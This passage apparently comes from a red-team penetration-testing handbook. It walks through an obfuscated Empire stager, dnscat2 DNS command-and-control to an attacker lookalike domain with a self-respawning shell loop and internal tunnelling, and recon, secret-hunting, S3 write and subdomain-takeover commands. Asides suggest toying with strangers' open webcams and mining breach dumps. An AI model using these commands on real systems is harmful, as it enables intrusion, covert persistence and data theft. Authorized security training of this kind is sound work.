Create stager available for OSX, Windows, Linux. We are going to
create a simple batfile as an example, but you can create macros for
Office files or payloads for a rubber ducky
usestager [tab twice to see all the different types]
usestager windows/launcher_bat
Look at all settings
info
Configure All Settings
set Listener http
 Configure the UserAgent
Create Payload
generate
Review your payload in another terminal window
cat tmplauncher.bat

As you can see, the payload that was created was heavily obfuscated. You can
now drop this.bat file on any Windows system. Of course, you would probably
create an Office Macro or a Rubber Ducky payload, but this is just one of many
examples.

If you don't already have PowerShell installed on your Kali image, the best way
to do so is to install it manually. Installing PowerShell on Kali:
apt-get install libunwind8
wget http://security.debian.org/debian-
security/pool/updates/main/o/openssl/libssl1.0.0_1.0.1t-
1+deb7u3_amd64.deb
dpkg -i libssl1.0.0_1.0.1t-1+deb7u3_amd64.deb
wget
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu55_55.1-
7ubuntu0.3_amd64.deb
dpkg -i libicu55_55.1-7ubuntu0.3_amd64.deb
wget
https://github.com/PowerShell/PowerShell/releases/download/v6.0.2/powershell_6
1.ubuntu.16.04_amd64.deb
dpkg -i powershell_6.0.2-1.ubuntu.16.04_amd64.deb

dnscat2
This tool is designed to create an encrypted Command and Control (C2) channel
over the DNS protocol, which is an effective tunnel out of almost every network
[https://github.com/iagox86/dnscat2].

C2 and exfiltration over DNS provides a great mechanism to hide your traffic,
evade network sensors, and get around network restrictions. In many restrictive
or production environments, we come across networks that either do not allow
outbound traffic or traffic that is heavily restricted/monitored. To get around
these protections, we can use a tool like dnscat2. The reason we are focusing on
dnscat2 is because it does not require root privileges and allows both shell access
and exfiltration.

In many secure environments, direct outbound UDP or TCP is restricted. Why
not leverage the services already built into the infrastructure? Many of these
protected networks contain a DNS server to resolve internal hosts, while also
allowing resolutions of external resources. By setting up an authoritative server
for a malicious domain we own, we can leverage these DNS resolutions to
perform Command and Control of our malware.

In our scenario, we are going to set up our attacker domain called
“loca1host.com”. This is a doppelganger to “localhost” in the hopes that we can
hide our traffic a little bit more. Make sure to replace “loca1host.com” to the
domain name you own. We are going to configure loca1host.com's DNS
information so it becomes an Authoritative DNS server. In this example, we are
going to use GoDaddy's DNS configuration tool, but you can use any DNS
service.
Setting Up an Authoritative DNS Server using GoDaddy
First, make sure to set up a VPS server to be your C2 attacking server
and get the IP of that server
Log into your GoDaddy (or similar) account after purchasing a
domain
Select your domain, click manage, and select Advanced DNS
Next, set up Hostnames in the DNS Management to point to your
Server
ns1 (and put the IP of your VPS server)
ns2 (and put the IP of your VPS server)
Edit Nameservers to Custom
Add ns1.loca1host.com
Add ns2.loca1host.com

As seen in the image above, we now have our nameservers pointing to
ns1.loca1host.com and ns2.loca1host.com, which both point to our attacker VPS
server. If you try to resolve any subdomain for loca1host.com (i.e.
vpn.loca1host.com), it will try to use our VPS server to perform those
resolutions. Luckily for us, dnscat2 listens on UDP port 53 and does all the
heavy lifting for us.

Next, we are going to need to fully set up our attacker server that is acting as our
nameserver. Setting up the dnscat2 Server:
sudo su -
apt-get update
apt-get install ruby-dev
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
apt-get install gcc make
gem install bundler
bundle install
Test to make sure it works: ruby./dnscat2.rb
 Quick Note: If you are using Amazon Lightsail, make sure to allow
UDP port 53

For the client code, we will need to compile it to make a binary for a Linux
payload.
Compiling the Client
git clone https://github.com/iagox86/dnscat2.git optdnscat2/client
cd optdnscat2/client/
make
We should now have a dnscat binary created!
(If in Windows: Load client/win32/dnscat2.vcproj into Visual Studio
and hit "build")

Now that we have our authoritative DNS configured, our attacker server running
dnscat2 as a DNS server, and our malware compiled, we are ready to execute our
payload.

Before we begin, we need to start dnscat on our attacker server. Although there
are multiple configurations to enable, the main one is configuring the --secret
flag to make sure our communication within the DNS requests are encrypted.
Make sure to replace loca1host.com with the domain name you own and create a
random secret string.

To start the dncat2 on your attacker server:
screen
ruby./dnscat2.rb loca1host.com --secret 39dfj3hdsfajh37e8c902j

Let's say you have some sort of RCE on a vulnerable server. You are able to run
shell commands and upload our dnscat payload. To execute our payload:./dnscat loca1host.com --secret 39dfj3hdsfajh37e8c902j

This will start dnscat, use our authoritative server, and create our C2 channel.
One thing I have seen is that there are times when dnscat2 dies. This could be
from large file transfers or something just gets messed up. To circumvent these
types of issues, I like to make sure that my dnscat payload returns. For this, I
generally like to start my dnscat payload with a quick bash script:
nohup binbash -c "while true; do optdnscat2/client/dnscat
loca1host.com --secret 39dfj3hdsfajh37e8c902j --max-retransmits 5;
 sleep 3600; done" > devnull 2>&1 &

This will make sure that if the client side payload dies for any reason, it will
spawn a new instance every hour. Sometimes you only have one chance to get
your payloads to run, so you need to make them count!

Lastly, if you are going to run this payload on Windows, you could use the
dnscat2 payload or… why not just do it in PowerShell?! Luke Baggett wrote up
a PowerShell version of the dnscat client here:
https://github.com/lukebaggett/dnscat2-powershell.
The dnscat2 Connection
After our payload executes and connects back to our attacker server, we should
see a new ENCRYPTED AND VERIFIED message similar to below. By typing
"window" dnscat2 will show all of your sessions. Currently, we have a single
command session called "1".

We can spawn a terminal style shell by interacting with our command session:
Interact with our first command sessions
window -i 1
Start a shell sessions
shell
Back out to the main session
Ctrl-z
Interact with the 2 session - sh
window -i 2
Now, you should be able to run all shell commands (i.e. ls)
Although this isn't the fastest shell, due to the fact that all communication is over
DNS, it really gets around those situations where a Meterpreter or similar shell
just won't work. What is even better about dnscat2 is that it fully supports
tunneling. This way, if we want to use an exploit from our host system, use a
browser to tunnel internal websites, or even SSH into another box, it is all
possible.
Tunnel in dnscat2
There are many times we want to route our traffic from our attacker server
through our compromised host, to other internal servers. The most secure way
to do this with dnscat2 is to route our traffic through the local port and then
tunnel it to an internal system on the network. An example of this can be
accomplished by the following command inside our command session:
listen 127.0.0.1:9999 10.100.100.1:22

Once the tunnel is created, we can go back to our root terminal window on our
attacker machine, SSH to localhost over port 9999, and authenticate to an
internal system on the victim's network.
This will provide all sorts of fun and a great test to see if your customer's
networks can detect massive DNS queries and exfiltration. So, what do the
request and responses look like? A quick Wireshark dump shows that dnscat2
creates massive amounts of different DNS requests to many different long
subdomains.

Now, there are many other protocols that you might want to test. For example,
Nishang has a PowerShell based ICMP Shell (http://bit.ly/2GXhdnZ) that uses
https://github.com/inquisb/icmpsh as the C2 server. There are other ICMP shells
like https://github.com/jamesbarlow/icmptunnel,
https://github.com/DhavalKapil/icmptunnel and http://code.gerade.org/hans/.

p0wnedShell
As stated on p0wnedShell’s Github page, this tool is “an offensive PowerShell
host application written in C# that does not rely on powershell.exe but runs
powershell commands and functions within a powershell runspace environment
(.NET). It has a lot of offensive PowerShell modules and binaries included to
make the process of Post Exploitation easier. What we tried was to build an “all
in one” Post Exploitation tool which we could use to bypass all mitigations
solutions (or at least some off), and that has all relevant tooling included. You
can use it to perform modern attacks within Active Directory environments and
create awareness within your Blue team so they can build the right defense
strategies.” [https://github.com/Cn33liz/p0wnedShell]

Pupy Shell
Pupy is “an opensource, cross-platform (Windows, Linux, OSX, Android)
remote administration and post-exploitation tool mainly written in python.”
[https://github.com/n1nj4sec/pupy].

One of the awesome features of Pupy is that you can run Python across all of
your agents without having a Python actually installed on all of your hosts. So,
if you are trying to script out a lot of your attacks in a custom framework, Pupy
is an easy tool with which to do this.

PoshC2
PoshC2 is “a proxy aware C2 framework written completely in PowerShell to
aid penetration testers with red teaming, post-exploitation and lateral movement.
The tools and modules were developed off the back of our successful
PowerShell sessions and payload types for the Metasploit Framework.
PowerShell was chosen as the base language as it provides all of the
functionality and rich features required without needing to introduce multiple
languages to the framework.” [https://github.com/nettitude/PoshC2]

Merlin
Merlin (https://github.com/Ne0nd0g/merlin) takes advantage of a recently
developed protocol called HTTP/2 (RFC7540). Per Medium, "HTTP/2
communications are multiplexed, bi-direction connections that do not end after
one request and response. Additionally, HTTP/2 is a binary protocol that makes
it more compact, easy to parse, and not human readable without the use of an
interpreting tool.” [https://medium.com/@Ne0nd0g/introducing-merlin-
645da3c635a#df21]

Merlin is a tool written in GO, looks and feels similar to PowerShell Empire, and
allows for a lightweight agent. It doesn't support any types of post exploitation
modules, so you will have to do it yourself.
Nishang
Nishang (https://github.com/samratashok/nishang) is a framework and collection
of scripts and payloads which enables usage of PowerShell for offensive
security, penetration testing and Red Teaming. Nishang is useful during all
phases of penetration testing.

Although Nishang is really a collection of amazing PowerShell scripts, there are
some scripts for lightweight Command and Control.
Conclusion
Now, you are finally prepared to head into battle with all of your tools and
servers configured. Being ready for any scenario will help you get around any
obstacle from network detection tools, blocked protocols, host based security
tools, and more.

For the labs in this book, I have created a full Virtual Machine based on Kali
Linux with all the tools. This VMWare Virtual Machine can be found here:
http://thehackerplaybook.com/get.php?type=THP-vm. Within the THP
archive, there is a text file named List_of_Tools.txt which lists all the added
tools. The default username/password is the standard root/toor.
2 before the snap - red team recon
In the last THP, the Before The Snap section focused on using different tools
such as Recon-NG, Discover, Spiderfoot, Gitrob, Masscan, Sparta, HTTP
Screenshot, Vulnerability Scanners, Burp Suite and more. These were tools that
we could use either externally or internally to perform reconnaissance or
scanning of our victim's infrastructure. We are going to continue this tradition
and expand on the reconnaissance phase from a Red Team perspective.
Monitoring an Environment
For Red Team campaigns, it is often about opportunity of attack. Not only do
you need to have your attack infrastructure ready at a whim, but you also need to
be constantly looking for vulnerabilities. This could be done through various
tools that scan the environments, looking for services, cloud misconfigurations,
and more. These activities allow you to gather more information about the
victim’s infrastructure and find immediate avenues of attack.
Regular Nmap Diffing
For all our clients, one of the first things we do is set up different monitoring
scripts. These are usually just quick bash scripts that email us daily diffs of a
client's network. Of course, prior to scanning, make sure you have proper
authorization to perform scanning.

For client networks that are generally not too large, we set up simple cronjob to
perform external port diffing. For example, we could create a quick Linux bash
script to do the hard work (remember to replace the IP range):
#!/bin/bash
mkdir optnmap_diff
d=$(date +%Y-%m-%d)
y=$(date -d yesterday +%Y-%m-%d)
usrbin/nmap -T4 -oX optnmap_diff/scan_$d.xml 10.100.100.0/24 >
devnull 2>&1
if [ -e optnmap_diff/scan_$y.xml ]; then
usrbin/ndiff optnmap_diff/scan_$y.xml
optnmap_diff/scan_$d.xml > optnmap_diff/diff.txt
fi

This is a very basic script that runs nmap every day using default ports and then
uses ndiff to compare the results. We can then take the output of this script and
use it to notify our team of new ports discovered daily.
In the last book, we talked heavily about the benefits of Masscan
(https://github.com/robertdavidgraham/masscan) and how much faster it is than
nmap. The developers of Masscan stated that, with a large enough network
pipeline, you could scan the entire internet in 6 minutes. The one issue we have
seen is with Masscan's reliability when scanning large ranges. It is great for
doing our initial reconnaissance, but generally isn't used for diffing.

Lab:
Labs in THP3 are completely optional. In some sections, I have included
addition labs to perform testing or for areas that you can expand on. Since this is
all about learning and finding your own passion, I highly recommend you spend
the time to make our tools better and share it with the community.

Build a better network diff scanner:
Build a better port list than the default nmap (i.e. nmap default
misses ports like Redis 6379/6380 and others)
Implement nmap banners
Keep historical tracking of ports
Build email alerting/notification system
Check out diff Slack Alerts: http://bit.ly/2H1o5AW
Web Screenshots
Other than regularly scanning for open ports/services, it is important for Red
Teams to also monitor for different web applications. We can use two tools to
help monitor for application changes.

The first web screenshot tool that we commonly use is HTTPScreenshot
(https://github.com/breenmachine/httpscreenshot). The reason HTTPScreenshot
is so powerful is that it uses Masscan to scan large networks quickly and uses
phantomjs to take screencaptures of any websites it detects. This is a great way
to get a quick layout of a large internal or external network.

Please remember that all tool references in this book are run from the THP
modified Kali Virtual Machine. You can find the Virtual Machine here:
http://thehackerplaybook.com/get.php?type=THP-vm. The username password
is the default: root/toor.

cd opthttpscreenshot/
Edit the networks.txt file to pick the network you want to scan:
gedit networks.txt./masshttp.sh
firefox clusters.html

The other tool to check out is Eyewitness
(https://github.com/ChrisTruncer/EyeWitness). Eyewitness is another great
tool that takes an XML file from nmap output and screenshots webpages, RDP
servers, and VNC Servers.

Lab:
cd optEyeWitness
nmap [IP Range]/24 --open -p 80,443 -oX scan.xml
 python./EyeWitness.py -x scan.xml --web

Cloud Scanning
As more and more companies switch over to using different cloud
infrastructures, a lot of new and old attacks come to light. This is usually due to
misconfigurations and a lack of knowledge on what exactly is publicly facing on
their cloud infrastructure. Regardless of Amazon EC2, Azure, Google cloud, or
some other provider, this has become a global trend.

For Red Teamers, a problem is how do we search on different cloud
environments? Since many tenants use dynamic IPs, their servers might not
only change rapidly, but they also aren’t listed in a certain block on the cloud
provider. For example, if you use AWS, they own huge ranges all over the
world. Based on which region you pick, your server will randomly be dropped
into a /13 CIDR range. For an outsider, finding and monitoring these servers
isn't easy.

First, it is important to figure out where the IP ranges are owned by different
providers. Some of the examples are:
Amazon: http://bit.ly/2vUSjED
Azure: http://bit.ly/2r7rHeR
Google Cloud: http://bit.ly/2HAsZFm

As you can tell these ranges are huge and scanning them manually would be
very hard to do. Throughout this chapter, we will be reviewing how we can gain
the information on these cloud systems.

Network/Service Search Engines
To find cloud servers, there are many great resources freely available on the
internet to perform reconnaissance on our targets. We can use everything from
Google all the way to third party scanning services. Using these resources will
allow us to dig into a company and find information about servers, open
services, banners, and other details passively. The company will never know
that you queried for this type of information. Let’s see how we use some of
these resources as Red Teamers.
Shodan
Shodan (https://www.shodan.io) is a great service that regularly scans the
internet, grabbing banners, ports, information about networks, and more. They
even have vulnerability information like Heartbleed. One of the most fun uses
for Shodan is looking through open web cams and playing around with them.
From a Red Team perspective, we want to find information about our victims.

A Few Basic Search Queries:
title: Search the content scraped from the HTML tag
html: Search the full HTML content of the returned page
product: Search the name of the software or product identified in the
banner
net: Search a given netblock (example: 204.51.94.79/18)

We can do some searches on Shodan for cyberspacekittens:
cyberspacekittens.com
 Search in the Title HTML Tag
title:cyberspacekittens
Search in the Context of the page
html:cyberspacekittens.com

Note, I have noticed that Shodan is a little slow in its scans. It took more than a
month to get my servers scanned and put into the Shodan database.

Censys.io
Censys continually monitors every reachable server and device on the Internet,
so you can search for and analyze them in real time. You will be able to
understand your network attack surface, discover new threats, and assess their
global impact [https://censys.io/]. One of the best features of Censys is that it
scrapes information from SSL certificates. Typically, one of the major
difficulties for Red Teamers is finding where our victim's servers are located on
cloud servers. Luckily, we can use Censys.io to find this information as they
already parse this data.

The one issue we have with these scans is that they can sometime be days or
weeks behind. In this case, it took one day to get scanned for title information.
Additionally, after creating an SSL certificate on my site, it took four days for
the information to show up on the Censys.io site. In terms of data accuracy,
Censys.io was decently reliable.

Below, we ran scans to find info about our target cyberspacekittens.com. By
parsing the server's SSL certificate, we were able to identify that our victim's
server was hosted on AWS.
There is also a Censys script tool to query it via a scripted process:
https://github.com/christophetd/censys-subdomain-finder.

Manually Parsing SSL Certificates
We commonly find that companies do not realize what they have available on
the internet. Especially with the increase of cloud usage, many companies do
not have ACLs properly implemented. They believe that their servers are
protected, but we discover that they are publicly facing. These include Redis
databases, Jenkin servers, Tomcat management, NoSQL databases, and more –
many of which led to remote code execution or loss of PII.

The cheap and dirty way to find these cloud servers is by manually scanning
SSL certificates on the internet in an automated fashion. We can take the list of
IP ranges for our cloud providers and scan all of them regularly to pull down
SSL certificates. Looking at the SSL certs, we can learn a great deal about an
organization. From the scan below of the cyberspacekittens range, we can see
hostnames in certificates with.int. for internal servers,.dev. for development,
vpn. for VPN servers, and more. Many times you can gain internal hostnames
that might not have public IPs or whitelisted IPs for their internal networks.

To assist in scanning for hostnames in certificates, sslScrape was developed for
THP3. This tool utilizes Masscan to quickly scan large networks. Once it
identifies services on port 443, it then strips the hostnames in the certificates.

sslScrape (https://github.com/cheetz/sslScrape):
cd optsslScrape
python./sslScrape.py [IP Address CIDR Range]
Examples of Cloud IP Addresses:
Amazon: http://bit.ly/2vUSjED
Azure: http://bit.ly/2r7rHeR
 Google Cloud: http://bit.ly/2HAsZFm

Throughout this book, I try to provide examples and an initial framework.
However, it is up to you to develop this further. I highly recommend you take
this code as a start, save all hostnames to a database, make a web UI frontend,
connect additional ports that might have certs like 8443, and maybe even look
for some vulnerabilities like.git/.svn style repos.

Subdomain Discovery
In terms of identifying IP ranges, we can normally look up the company from
public sources like the American Registry for Internet Numbers (ARIN) at
https://www.arin.net/. We can look up IP address space to owners, search
Networks owned by companies, Autonomous System Numbers by organization,
and more. If we are looking outside North America, we can look up via
AFRINIC (Africa), APNIC (Asia), LACNIC (Latin America), and RIPE NCC
(Europe). These are all publicly available and listed on their servers.

You can look up any hostname or FQDN to find the owner of that domain
through many available public sources (one of my favorites to quickly lookup
ownership is https://centralops.net/co/domaindossier.aspx). What you can't find
listed anywhere are subdomains. Subdomain information is stored on the target's
DNS server versus registered on some central public registration system. You
have to know what to search for to find a valid subdomain.

Why are subdomains so important to find for your victim targets? A few reasons
are:
Some subdomains can indicate the type of server it is (i.e. dev, vpn,
mail, internal, test). For example, mail.cyberspacekittens.com.
Some servers do not respond by IP. They could be on shared
infrastructure and only respond by fully qualified domains. This is
very common to find on cloud infrastructure. So you can nmap all
day, but if you can’t find the subdomain, you won't really know what
applications are behind that IP.
Subdomains can provide information about where the target is
hosting their servers. This is done by finding all of a company's
subdomains, performing reverse lookups, and finding where the IPs
are hosted. A company could be using multiple cloud providers and
datacenters.
We did a lot of discovery in the last book, so let's review some of the current and
new tools to perform better discovery. Feel free to join in and scan the
cyberspacekittens.com domain.
Discover Scripts
Discover Scripts (https://github.com/leebaird/discover) tool is still one of my
favorite recon/discovery tools discussed in the last book. This is because it
combines all the recon tools on Kali Linux and is maintained regularly. The
passive domain recon will utilize all the following tools: Passive uses ARIN,
dnsrecon, goofile, goog-mail, goohost, theHarvester, Metasploit, URLCrazy,
Whois, multiple websites, and recon-ng.
git clone https://github.com/leebaird/discover optdiscover/
cd optdiscover/./update.sh./discover.sh
Domain
Passive
[Company Name]
[Domain Name]
firefox rootdata/[Domain]/index.htm

The best part of Discover scripts is that it takes the information it gathers and
keeps searching based on that information. For example, from searching
through the public PGP repository it might identify emails and then use that
information to search Have I Been Pwned (through Recon-NG). That will let us
know if any passwords have been found through publicly-released compromises
(which you will have to find on your own).
KNOCK
Next, we want to get a good idea of all the servers and domains a company
might use. Although there isn’t a central place where subdomains are stored, we
can bruteforce different subdomains with a tool, such as Knock, to identify what
servers or hosts might be available for attack.

Knockpy is a python tool designed to enumerate subdomains on a target domain
through a wordlist.

Knock is a great subdomain scan tool that takes a list of subdomains and checks
it to see if it resolves. So if you have cyberspacekittens.com, Knock will take
this wordlist (http://bit.ly/2JOkUyj), and see if there are any subdomains for
[subdomain].cyberspacekittens.com. Now, the one caveat here is that it is only
as good as your word list. Therefore, having a better wordlist increases your
chances of finding subdomains.

One of my favorite subdomains is created by jhaddix and is located here:
http://bit.ly/2qwxrxB. Subdomains are one of those things that you should
always be collecting. Some other good lists can be found on your THP Kali
image under optSecLists or here:
https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS.

Lab:
Find all the subdomains for cyberspacekittens.com:
cd optknock/knockpy
python./knockpy.py cyberspacekittens.com
This uses the basic wordlist from Knock. Try downloading and
using a much larger wordlist. Try using the http://bit.ly/2qwxrxB list
using the -u switch. (i.e. python./knockpy.py cyberspacekittens.com
-u all.txt).

What types of differences did you find from Discover scripts? What types of
domains would be your first targets for attacks or used with spearphishing
domain attacks? Go and give it a try in the real world. Go find a bug bounty
program and look for juicy-looking subdomains.
Sublist3r
As previously mentioned, the problem with Knock is that it is only as good as
your wordlist. Some companies have very unique subdomains that can't be
found through a common wordlist. The next best resource to go to are search
engines. As sites get spidered, files with links get analyzed and scraped public
resources become available, which means we can use search engines to do the
hard work for us.

This is where we can use a tool like Sublist3r. Note, using a tool like this uses
different "google dork" style search queries that can look like a bot. This could
get you temporarily blacklisted and require you to fill out a captcha with every
request, which may limit the results from your scan. To run Sublister:
cd optSublist3r
 python sublist3r.py -d cyberspacekittens.com -o
cyberspacekittens.com

Notice any results that might have never been found from subdomain
bruteforcing? Again, try this against a bug bounty program to see significant
differences between bruteforcing and using search engines.

*There is a forked version of Sublist3r that also performs subdomain checking:
https://github.com/Plazmaz/Sublist3r.
SubBrute
The last subdomain tool is called SubBrute. SubBrute is a community-driven
project with the goal of creating the fastest, and most accurate subdomain
enumeration tool. Some of the magic behind SubBrute is that it uses open
resolvers as a kind of proxy to circumvent DNS rate-limiting (https://www.us-
cert.gov/ncas/alerts/TA13-088A). This design also provides a layer of
anonymity, as SubBrute does not send traffic directly to the target's name
servers. [https://github.com/TheRook/subbrute]

Not only is SubBrute extremely fast, it performs a DNS spider feature that
crawls enumerated DNSrecords. To run SubBrute:
cd optsubbrute./subbrute.py cyberspacekittens.com

We can also take SubBrute to the next level and combine it with MassDNS to
perform very high-performance DNS resolution (http://bit.ly/2EMKIHg).
Github
Github is a treasure trove of amazing data. There have been a number of
penetration tests and Red Team assessments where we were able to get
passwords, API keys, old source code, internal hostnames/IPs, and more. These
either led to a direct compromise or assisted in another attack. What we see is
that many developers either push code to the wrong repo (sending it to their
public repository instead of their company’s private repository), or accidentally
push sensitive material (like passwords) and then try to remove it. One good
thing with Github is that it tracks every time code is modified or deleted. That
means if sensitive code at one time was pushed to a repository and that sensitive
file is deleted, it is still tracked in the code changes. As long as the repository is
public, you will be able to view all of these changes.
We can either use Github search to identify certain hostnames/organizational
names or even just use simple Google Dork search, for example:
site:github.com + "cyberspacekittens”.

Try searching bug bounty programs using different organizations instead of
searching for cyberspacekittens for the following examples.

Through all your searching, you come across:
https://github.com/cyberspacekittens/dnscat2 (modified example for GitHub
lab). You can manually take a peek at this repository, but usually it will be so
large that you will have a hard time going through all of the projects to find
anything juicy.

As mentioned before, when you edit or delete a file in Github, everything is
tracked. Fortunately for Red Teamers, many people forget about this feature.
Therefore, we often see people put sensitive information into Github, delete it,
and not realize it's still there! Let's see if we can find some of these gems.
Truffle Hog
Truffle Hog tool scans different commit histories and branches for high entropy
keys, and prints them. This is great for finding secrets, passwords, keys, and
more. Let's see if we can find any secrets on cyberspacekittens' Github
repository.

Lab:
cd opttrufflehog/truffleHog
python truffleHog.py https://github.com/cyberspacekittens/dnscat2
As we can see in the commit history, AWS keys and SSH keys were removed
from server/controller/csk.config, but if you look at the current repo, you won't
find this file: https://github.com/cheetz/dnscat2/tree/master/server/controller.

Even better (but a little more complicated to set up) is git-all-secrets from
(https://github.com/anshumanbh/git-all-secrets). Git-all-secrets is useful when
looking through large organizations. You can just point to an organization and
have it clone the code locally, then scan it with Trufflehog and repo-supervisor.
You will first need to create a Github Access Token, which is free by creating a
Github and selecting Generate New Token in the settings.

To run git-all-secrets:
cd optgit-all-secrets
docker run -it abhartiya/tools_gitallsecrets:v3 -
repoURL=https://github.com/cyberspacekittens/dnscat2 -token=[API
Key] -output=results.txt
This will clone the repo and start scanning. You can even run
through whole organizations in Github with the -org flag.
After the container finishes running, retrieve the container ID by
typing:
docker ps -a
Once you have the container ID, get the results file from the
container to the host by typing:
docker cp :/data/results.txt.

Cloud
As we spoke prior, cloud is one area where we see a lot of companies improperly
securing their environment. The most common issues we generally see are:
Amazon S3 Missing Buckets:
https://hackerone.com/reports/121461
Amazon S3 Bucket Permissions:
https://hackerone.com/reports/128088
Being able to list and write files to public AWS buckets:
aws s3 ls s3://[bucketname]
aws s3 mv test.txt s3://[bucketname]
Lack of Logging

Before we can start testing misconfigurations on different AWS buckets, we
need to first identify them. We are going to try a couple different tools to see
what we can discover on our victim’s AWS infrastructure.
S3 Bucket Enumeration
There are many tools that can perform S3 bucket enumeration for AWS. These
tools generally take keywords or lists, apply multiple permutations, and then try
to identify different buckets. For example, we can use a tool called Slurp
(https://github.com/bbb31/slurp) to find information about our target
CyberSpaceKittens:
cd optslurp./slurp domain -t cyberspacekittens.com./slurp keyword -t cyberspacekittens

Bucket Finder
Another tool, Bucket Finder, will not only attempt to find different buckets, but
also download all the content from those buckets for analysis:
wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O
bucket_finder_1.1.tar.bz2
cd optbucket_finder./bucket_finder.rb --region us my_words --download
You have been running discovery on Cyber Space Kittens’ infrastructure and
identify one of their S3 buckets (cyberspacekittens.s3.amazonaws.com). What
are your first steps in retrieving what you can and cannot see on the S3 bucket?
You can first pop it into a browser and see some information:

Prior to starting, we need to create an AWS account to get an Access Key ID.
You can get yours for free at Amazon here:
https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free_np/.
Once you create an account, log into AWS, go to Your Security Credentials
(https://amzn.to/2ItaySR), and then to Access Keys. Once you have your AWS
Access ID and Secret Key, we can query our S3 buckets.

Query S3 and Download Everything:
Install awscli
sudo apt install awscli
Configure Credentials
aws configure
 Look at the permissions on CyberSpaceKittens' S3 bucket
aws s3api get-bucket-acl --bucket cyberspacekittens
Read files from the S3 Bucket
aws s3 ls s3://cyberspacekittens
Download Everything in the S3 Bucket
aws s3 sync s3://cyberspacekittens.

Other than query S3, the next thing to test is writing to that bucket. If we have
write access, it could allow complete RCE of their applications. We have often
seen that when files stored on S3 buckets are used on all of their pages (and if
we can modify these files), we can put our malicious code on their web
application servers.

Writing to S3:
echo "test" > test.txt
aws s3 mv test.txt s3://cyberspacekittens
aws s3 ls s3://cyberspacekittens

*Note, write has been removed from the Everyone group. This was just for
demonstration.

Modify Access Controls in AWS Buckets
When analyzing AWS security, we need to review the controls around
permissions on objects and buckets. Objects are the individual files and buckets
are logical units of storage. Both of these permissions can potentially be
modified by any user if provisioned incorrectly.

First, we can look at each object to see if these permissions are configured
correctly:
aws s3api get-object-acl --bucket cyberspacekittens --key ignore.txt

We will see that the file is only writeable by a user named “secure”. It is not
open to everyone. If we did have write access, we could use the put-object in
s3api to modify that file.

Next, we look to see if we can modify the buckets themselves. This can be
accomplished with:
aws s3api get-bucket-acl --bucket cyberspacekittens

Again, in both of these cases, READ is permissioned globally, but
FULL_CONTROL or any write is only allowed by an account called “secure”.
If we did have access to the bucket, we could use the --grant-full-control to give
ourselves full control of the bucket and objects.

Resources:
https://labs.detectify.com/2017/07/13/a-deep-dive-into-aws-s3-
access-controls-taking-full-control-over-your-assets/

Subdomain Takeovers
Subdomain takeovers are a common vulnerability we see with almost every
company these days. What happens is that a company utilizes some third party
CMS/Content/Cloud Provider and points their subdomains to these platforms. If
they ever forget to configure the third party service or deregister from that
server, an attacker can take over that hostname with the third party.

For example, you register an S3 Amazon Bucket with the name
testlab.s3.amazonaws.com. You then have your company’s subdomain
testlab.company.com point to testlab.s3.amazonaws.com. A year later, you no
longer need the S3 bucket testlab.s3.amazonaws.com and deregister it, but forget
the CNAME redirect for testlab.company.com. Someone can now go to AWS
and set up testlab.s3.amazon.com and have a valid S3 bucket on the victim’s
domain.

One tool to check for vulnerable subdomains is called tkosubs. We can use this
tool to check whether any of the subdomains we have found pointing to a CMS
provider (Heroku, Github, Shopify, Amazon S3, Amazon CloudFront, etc.) can
be taken over.

Running tkosubs:
cd opttkosubs/./tkosubs -domains=list.txt -data=providers-data.csv -
output=output.csv

If we do find a dangling CNAME, we can use tkosubs to take over Github Pages
and Heroku Apps. Otherwise, we would have to do it manually. Two other
tools that can help with domain takeovers are:
HostileSubBruteforcer
(https://github.com/nahamsec/HostileSubBruteforcer)
autoSubTakeover (https://github.com/JordyZomer/autoSubTakeover)

Want to learn more about AWS vulnerabilities? A great CTF AWS
Walkthrough: http://flaws.cloud/.

Emails
A huge part of any social engineering attack is to find email addresses and
names of employees. We used Discover Script in the previous chapters, which
is great for collecting much of this data. I usually start with Discover scripts and
begin digging into the other tools. Every tool does things slightly differently and
it is beneficial to use as many automated processes as you can.

Once you get a small list of emails, it is good to understand their email format.
Is it firstname.lastname @cyberspacekitten.com or is it first initial.lastname
@cyberspacekittens.com? Once you can figure out their format, we can use
tools like LinkedIn to find more employees and try to identify their email
addresses.
SimplyEmail
We all know that spear phishing is still one of the more successful avenues of
attack. If we don’t have any vulnerabilities from the outside, attacking users is
the next step. To build a good list of email addresses, we can use a tool like
SimplyEmail. The output of this tool will provide the email address format of
the company and a list of valid users

Lab:
Find all email accounts for cnn.com
cd optSimplyEmail./SimplyEmail.py -all -v -e cyberspacekittens.com
firefox cyberspacekittens.com/Email_List.html

This may take a long time to run as it checks Bing, Yahoo, Google, Ask Search,
PGP Repos, files, and much more. This may also make your network look like a
bot to search engines and may require captchas if you produce too many search
requests.

Run this against your company. Do you see any email addresses that you
recognize? These might be the first email addresses that could be targeted in a
large scale campaign.
Past Breaches
One of the best ways to get email accounts is to continually monitor and capture
past breaches. I don't want to link directly to the breaches files, but I will
reference some of the ones that I have found useful:

1.4 Billion Password Leak 2017:
https://thehackernews.com/2017/12/data-breach-password-list.html
Adobe Breach from 2013:
https://nakedsecurity.sophos.com/2013/11/04/anatomy-of-a-
password-disaster-adobes-giant-sized-cryptographic-blunder/
Pastebin Dumps: http://psbdmp.ws/
Exploit.In Dump
Pastebin Google Dork: site:pastebin.com
intext:cyberspacekittens.com
Additional Open Source Resources
I didn't know exactly where to put these resources, but I wanted to provide a
great collection of other resources used for Red Team style campaigns. This can
help identify people, locations, domain information, social media, image
analysis, and more.

Collection of OSINT Links:
https://github.com/IVMachiavelli/OSINT_Team_Links
OSINT Framework: http://osintframework.com/
Conclusion
In this chapter we went over all the different reconnaissance tactics and tools of
the trade. This is just a start as many of these techniques are manual and require
a fair amount of time to execute. It is up to you to take this to the next level,
automate all these tools, and make the recon fast and efficient.
3 the throw - web application exploitation
Over the past couple of years, we have seen some critical, externally-facing web
attacks. Everything from the Apache Struts 2 (although not confirmed for the
Equifax breach - http://bit.ly/2HokWi0), Panera Bread (http://bit.ly/2qwEMxH),
and Uber (http://ubr.to/2hIO2tZ). There is no doubt we will continue to see
many other severe breaches from public internet facing end-points.

The security industry, as a whole, runs in a cyclical pattern. If you look at the
different layers of the OSI model, the attacks shift to a different layer every other
year. In terms of web, back in the early 2000s, there were tons of SQLi and RFI
type exploits. However, once companies started to harden their external
environments and began performing external penetration test, we, as attackers,
